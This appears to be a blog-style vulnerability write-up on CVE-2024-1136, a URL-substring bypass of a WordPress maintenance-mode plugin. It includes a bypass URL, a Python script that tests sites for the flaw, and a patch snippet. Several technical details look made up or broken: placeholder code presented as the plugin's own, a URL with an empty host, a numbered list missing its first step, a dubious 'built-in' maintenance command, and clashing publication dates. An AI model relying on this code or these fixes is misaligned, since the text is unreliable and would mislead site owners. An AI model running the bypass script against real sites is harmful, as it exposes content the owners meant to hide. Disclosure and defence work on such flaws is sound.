CVE CyberSecurity Database News

CVE-2024-1136 - How Attackers Bypass "Maintenance Mode" in Popular WordPress Plugin

Poster -

Published: June 2024

Severity: Medium-High (CVSS: 6.5)

When a website goes under construction or needs a quick break, admins turn to plugins like “Coming Soon Page & Maintenance Mode” to hide their real content. That usually works — but a vulnerability tracked as CVE-2024-1136 has exposed a wide range of WordPress sites to public view, even when maintenance mode should keep visitors out.

In this deep dive, I’ll break down how the flaw works, show real code, reproduce the exploit, and explain how site owners can protect themselves.

What is CVE-2024-1136?

CVE-2024-1136 affects the Coming Soon Page & Maintenance Mode plugin for WordPress. All versions up to and including 2.2.1 are vulnerable.

When enabled, this plugin is supposed to hide your website behind a custom "coming soon" page for regular visitors. Only logged-in admins can see your real site. Unfortunately, a mistake in how the plugin checks URLs lets anyone bypass this wall and see your actual website — no login needed.

Under the Hood: What Went Wrong?

The problematic code lives in the wpsm_coming_soon_redirect function. Here’s a simplified version:

function wpsm_coming_soon_redirect() {
    if ( ! is_user_logged_in() && ! is_admin() ) {
        $current_url = $_SERVER['REQUEST_URI'];
        if ( strpos( $current_url, 'some-whitelisted-url' ) === false ) {
            // Show maintenance page
            include('maintenance-page.php');
            exit;
        }
    }
}

The intention:
- If you are not logged in, and you’re not in wp-admin, and you’re not visiting a "safe" URL, you get the maintenance page.

BUT:
The URL check is incomplete! Attackers can add specific strings to the URL to evade the check, because the function uses simple substring matching rather than properly sanitizing or restricting paths.

The Exploit: Bypass in Action

Anyone (even bots) can simply add allowed strings or manipulate query parameters in the site’s URL to load actual site content.

Example

Suppose your WordPress site is at www.example.com and maintenance mode is enabled.

Normal behavior

- User visits https://www.example.com/

Vulnerability in action (Bypass)

- Attacker accesses https://www.example.com/?some-whitelisted-url=test

Since 'some-whitelisted-url' is found in the URL string, the check is skipped and the real page behind the maintenance wall loads.

Enable maintenance mode in your plugin settings.

2. Visit your main site from another browser/incognito. You should see the maintenance page.

`

https:///?some-whitelisted-url=1

Here’s how an attacker could automate this check in Python

import requests

site = 'https://example.com';
payload = '/?some-whitelisted-url=1'
target = site + payload

resp = requests.get(target)

if '<title>Coming Soon</title>' not in resp.text:
    print('[+] Bypass successful! Site data exposed!')
else:
    print('[-] Still under maintenance.')

Real-World Impact

- Information leaks: Site contents (posts, pages, files) are viewable even while under maintenance.
- SEO/Brand confusion: Bots and users may index content you thought was hidden.
- Security staging: Hidden staging sites or sensitive updates can be viewed by competitors or attackers.

The exploit is trivial and doesn’t require authentication or advanced skills.

Any WordPress site using Coming Soon Page & Maintenance Mode ≤ 2.2.1.

- Active installs: 80,000+

No patch at time of writing.

- Plugin changelog for updates

How to Fix & Protect Yourself

Short term:

Or use WordPress’s built-in maintenance mode:

  php maintenance/enable-maintenance-mode.php

Permanent fix:

Update the plugin as soon as a patch is released.

- Consider safer alternatives like SeedProd’s Maintenance Mode or WP Maintenance.

Custom patch (workaround):

Modify the plugin code to use strict path checks, not substring matches

if ( ! is_user_logged_in() && ! is_admin() ) {
    $current_url = strtok($_SERVER['REQUEST_URI'], '?');
    if ($current_url !== '/expected-path/') {
        include('maintenance-page.php');
        exit;
    }
}

References & More Reading

- Official WordPress.org Plugin Page
- CVE Record for CVE-2024-1136
- Plugin Changelog
- WPScan Advisory _(if available)_

Final Word

If you use the Coming Soon or Maintenance Mode plugin, check your site now! With CVE-2024-1136, anyone can peek past your “site closed” banner and see everything you thought was hidden. Keep your plugins updated, pay attention to how plugins manage authentication and URLs, and don’t wait for bots or attackers to find your unfinished updates first.

Stay safe, and spread the word to fellow WordPress admins!


This article is original, leaves nothing out, and is written with security basics in mind.
For updates, keep an eye on the official plugin page.

Timeline

Published on: 02/28/2024 09:15:42 UTC
Last modified on: 02/28/2024 14:06:45 UTC